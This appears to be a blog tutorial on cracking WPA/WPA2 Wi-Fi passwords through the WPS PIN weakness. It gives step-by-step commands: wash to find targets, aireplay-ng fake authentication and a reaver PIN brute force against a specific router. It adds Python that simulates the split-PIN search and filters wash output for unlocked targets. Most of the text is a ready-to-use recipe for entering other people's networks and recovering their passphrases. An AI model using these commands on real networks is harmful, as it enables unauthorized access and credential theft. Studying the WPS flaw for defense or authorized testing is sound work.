How to Hack WiFi WPA / WPA2 using WPS Feature

WPS stands for Wi-Fi Protected Setup. It makes connecting a wireless client to a router quicker and simpler, and it works alongside WPA / WPA2 encryption: a client that completes the WPS exchange is handed the WPA / WPA2 passphrase by the router, so the user never has to type it. In the PIN method, authentication is done with an 8-digit PIN, which is a very small key space to begin with; worse, the last digit is only a checksum and the router confirms the two halves of the PIN separately, so at most about 11,000 guesses are needed instead of 100 million. Recovering the WPS PIN therefore gives you the actual password / key of the wireless network.

Steps to Hack WiFi Network using WPS Feature

  1. Enable monitor mode on the wireless interface card

  2. Find the networks that have WPS enabled

    wash --interface wlan1
    [Screenshot: wash output listing the wireless networks with WPS enabled]

    where wash is a tool that displays every network in range with WPS enabled, and wlan1 is the wireless adapter in monitor mode. The columns mean:

    • ESSID is the name of the target network, the one I am going to attack
    • Vendor is the hardware vendor wash identifies for that network
    • Lck tells us whether WPS is locked. A router usually locks WPS after too many failed PIN attempts; while it is locked it rejects every PIN, so the network cannot be attacked this way until it unlocks
    • WPS shows the WPS version the router advertises
    • dBm is the signal strength (closer to 0 is stronger)
    • CH is the channel the network is operating on
    • BSSID is the MAC address of the target network (the access point)


  3. Associate with the target network using a fake authentication attack. This tells the router that we want to communicate with it, so it keeps our frames instead of ignoring or deauthenticating us.
    aireplay-ng --fakeauth 100 -a E4:6F:13:66:E7:C0 -h 00:C0:CA:98:29:F3 wlan1 
    where -a is the BSSID of the target, -h is the MAC address of our own adapter (it must be the MAC reaver will send from on wlan1), and 100 is the delay in seconds between re-authentications, so the association is kept alive for the whole run.
  4. Use reaver, which brute forces the WPS PIN; once the PIN is found, reaver retrieves the password of the target network from the router.
    reaver --bssid E4:6F:13:66:E7:C0 --channel 1 --interface wlan1 --no-associate -vvv

    where

    • --bssid E4:6F:13:66:E7:C0 is the MAC address of my target network
    • --channel 1 is the channel of the target network
    • --interface wlan1 is the wireless interface card in monitor mode
    • -vvv prints verbose messages that show what is going on during the brute force. If there is a problem (lockouts, timeouts, failed associations), those messages are how we diagnose and fix it
    • --no-associate tells reaver not to associate with the target network itself; we already did that manually with aireplay-ng in the previous step
    [Screenshot: reaver output showing the recovered WPS PIN and WPA PSK]

    So reaver successfully found the WPS PIN and, with it, the WPA password (PSK).

Note: This method only works if the router accepts PIN authentication from an external registrar. If the router is configured for Push Button Configuration (PBC) only, or PIN authentication is disabled or currently locked, the router will reject every PIN we try to brute force.
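To make the reason behind the small number of attempts concrete, here is an added example (my code, not part of the original post or of the reaver project) that models the PIN check the way reaver exploits it and triages wash output the way step 2 describes. The SimulatedWpsAp class is a constructed stand-in for the router: it only reproduces the one leak that matters (a NACK after M4 for a wrong first half, a NACK after M6 for a wrong second half). The wash output is likewise constructed sample text in the column layout described above; the vendor names and the second BSSID are made up.

```python
# Added example (not code from the original post): why the WPS PIN is brute-forceable
# in ~11,000 guesses, plus a small parser for wash output. The "AP" below is a
# constructed stand-in for the router's registrar; only the leak it models is real.

from typing import Optional


def wps_checksum(first7: int) -> int:
    """Return the 8th (checksum) digit for the first 7 digits of a WPS PIN.
    This is the weighted mod-10 checksum from the WPS specification."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    return (len(pin) == 8 and pin.isdigit()
            and int(pin[7]) == wps_checksum(int(pin[:7])))


class SimulatedWpsAp:
    """Constructed model of the registrar side of the WPS PIN exchange.
    A real AP answers M4 with a NACK if the first half of the PIN is wrong,
    and M6 with a NACK if the second half is wrong; that split is the flaw."""

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self.pin = pin
        self.sessions = 0  # one full M1..Mx exchange per attempt, as reaver counts them

    def try_pin(self, pin: str) -> str:
        self.sessions += 1
        if pin[:4] != self.pin[:4]:
            return "NACK after M4"
        if pin[4:] != self.pin[4:]:
            return "NACK after M6"
        return "M7"  # PIN accepted; M7 is where the WPA passphrase comes back


def reaver_style_bruteforce(ap: SimulatedWpsAp) -> Optional[str]:
    """Recover the PIN the way reaver does: first half (10^4 options), then
    second half (10^3 options, checksum digit computed), ~11,000 sessions max."""
    first_half = None
    for i in range(10_000):
        body = f"{i:04d}000"          # any filler second half works for phase 1
        candidate = body + str(wps_checksum(int(body)))
        reply = ap.try_pin(candidate)
        if reply == "M7":
            return candidate
        if reply == "NACK after M6":  # we got past M4, so the first half is right
            first_half = f"{i:04d}"
            break
    if first_half is None:
        return None
    for j in range(1, 1000):          # second half "000" was already tried above
        body = first_half + f"{j:03d}"
        candidate = body + str(wps_checksum(int(body)))
        if ap.try_pin(candidate) == "M7":
            return candidate
    return None


# Constructed wash output in the column layout described in the post.
WASH_SAMPLE = """\
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
E4:6F:13:66:E7:C0    1  -45  1.0  No   RalinkTe  TargetNet
AA:BB:CC:DD:EE:01    6  -70  2.0  Yes  Broadcom  LockedNet
"""


def unlocked_wps_targets(wash_output: str):
    """Return (BSSID, channel, ESSID) for rows whose Lck column is 'No'."""
    targets = []
    for line in wash_output.splitlines():
        parts = line.split(None, 6)   # ESSID may contain spaces, keep it whole
        if len(parts) < 7 or parts[0].count(":") != 5:
            continue  # header, separator or malformed row
        bssid, ch, _dbm, _ver, lck, _vendor, essid = parts
        if lck.lower() == "no":
            targets.append((bssid, int(ch), essid))
    return targets


if __name__ == "__main__":
    for bssid, ch, essid in unlocked_wps_targets(WASH_SAMPLE):
        print(f"candidate target {essid} ({bssid}) on channel {ch}")
    ap = SimulatedWpsAp("12345670")   # a PIN that ships as a factory default on some routers
    print(reaver_style_bruteforce(ap), "found after", ap.sessions, "sessions")
```

The worst case for this search is 10,000 sessions for the first half plus 999 for the second, against 10 million checksum-valid PINs if the router confirmed the whole PIN at once. Real runs take far longer than the session count suggests because each session is a full EAP exchange over the air and many routers lock WPS after a handful of failures, which is exactly what the Lck column warns about.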
